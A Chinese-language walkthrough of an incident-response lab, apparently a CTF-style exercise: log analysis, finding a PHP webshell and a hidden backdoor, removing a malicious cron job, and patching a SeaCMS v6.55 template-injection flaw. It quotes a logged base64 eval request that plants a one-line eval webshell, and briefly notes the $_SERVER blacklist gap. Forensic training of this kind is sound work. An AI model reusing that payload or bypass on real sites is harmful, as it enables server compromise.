开启靶场：

开始实验：

使用Xshell登录服务器，账号及密码如上图。

1、提交攻击者的IP地址

WP:

找到服务器日志路径，通常是在/var/log/，使用cd /var/log/，ls查看此路径下的文件.

找到nginx文件夹。

进入nginx文件夹，找到access.log文件。

下载access.log到本地电脑，使用Notepad++打开。

发现38.207.130.14这个IP地址对多个页面发送HEAD请求，而且根据404后面的DirBuster-1.0-RC1 可得到是一个目录扫描工具，由此可得出攻击IP为38.207.130.14。提交成功！

2、提交攻击者目录扫描所使用的工具名称

通过第一题，得到扫描工具是DirBuster-1.0-RC1，根据题目提示工具名称要用小写，经过提交测试发现，提交的时候不需要带版本，只提交dirbuster就可以提交成功。

3、提交攻击者首次攻击成功的时间

继续查看access.log，发现了一些a.php上传请求，有可能是上传的木马文件，那"POST /a.php HTTP/1.1" 上面一条"POST /search.php?eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/PicpOw==')); HTTP/1.1"就是上传木马操作。

根据日志显示这个POST上传请求是使用base64编码的，那么我们使用Base64编码解码工具进行解码，根据解码内容可知确实是上传木马的操作。那么上传日期就是这个日志的操作时间，

题目要求格式为：DD/MM/YY:HH:MM:SS（例如31/01/2000:01:02:03），对攻击成功日期进行格式转换，转换后03/11/2023:15:03:35提交成功。

4、找到攻击者写入的恶意后门文件

提交文件名（完整路径）

根据前面我们知道a.php是上传的木马，也就是攻击者写入的恶意后门文件，那就可以查找a.php所在的完整路径。

find / -name a.php

得到完整路径为：/var/www/html/a.php，提交成功。

5、找到攻击者写入的恶意后门文件密码

我们知道恶意后门文件是a.php，上一题也知道路径，那么进入a.php文件所在的路径

cd /var/www/html/

ls查看文件，找到a.php文件，使用vi命令查看文件内容

方括号里面的“1”即为密码，提交成功。

6、找到攻击者隐藏在正常web应用代码中的恶意代码

提交该文件名（完整路径）

通过查看/var/www/html/下的文件，找了好长时间，发现/var/www/html/include/webscan/360webscan.php文件的这些代码很奇怪，通过搜索的出是隐蔽的后门木马。

那么/var/www/html/include/webscan/360webscan.php就是恶意代码的完整路径，提交成功。

7、识别系统中存在的恶意程序进程

提交文件名（完整路径）

首先使用“ps -aux”命令查进程，查出来的进程比较多，也不能判断那个是恶意进程。

既然是恶意进程，那就有计划任务，我们再查下计划任务。

cd /var/spool/cron
ls
vi www-data

发现只有一个计划任务，路径是/var/crash/php-fpm，提交成功。

8、识别系统中存在的恶意程序进程2

提交C&C服务器IP地址和端口（格式：1.1.1.1:22）

9、修复网站漏洞

进入网站目录，查看网站主页，index.php。

cd /var/www/html
ls

访问网站，http://47.103.131.47/index.php，网页下拉到底，可知为海洋CMS。

查看海洋CMS的版本

cd /var/www/html/data/admin
ls

找到ver.txt，是存放版本号的文件

vi ver.txt

得到海洋CMS的版本为v6.55

查询海洋CMS v6.55漏洞

漏洞分析：官方给出的修复是在parseIf函数里面加了黑名单。但是没有做SERVER变量的过滤，所以可以用SERVER变量的性质来达到写入命令。

修复方法1

修改/var/www/html/include/main.class.php文件里面的parseIf函数，补充黑名单增加_SERVER，保存后点击check,提交成功。

修复方法2

修改/var/www/html下的search.php文件；

在echoSearchPage()函数中增加一条过滤语句：if(strpos($searchword,'{searchpage:')) exit;

10、 删除恶意程序、文件、代码

删除/var/www/html路径下的a.php

rm a.php

删除/var/crash/路径下的

rm php-fpm

删除/var/www/html/include/webscan/360webscan.php里面的木马内容，记住不要删除整个文件，要不然系统会提示修复失败。

还有删除php-fpm的计划任务

cd /var/spool/cron/crontabs/
ls
vi www-data

删除红圈里的内容，:wq!保存。

删除后

checking完成，提交成功。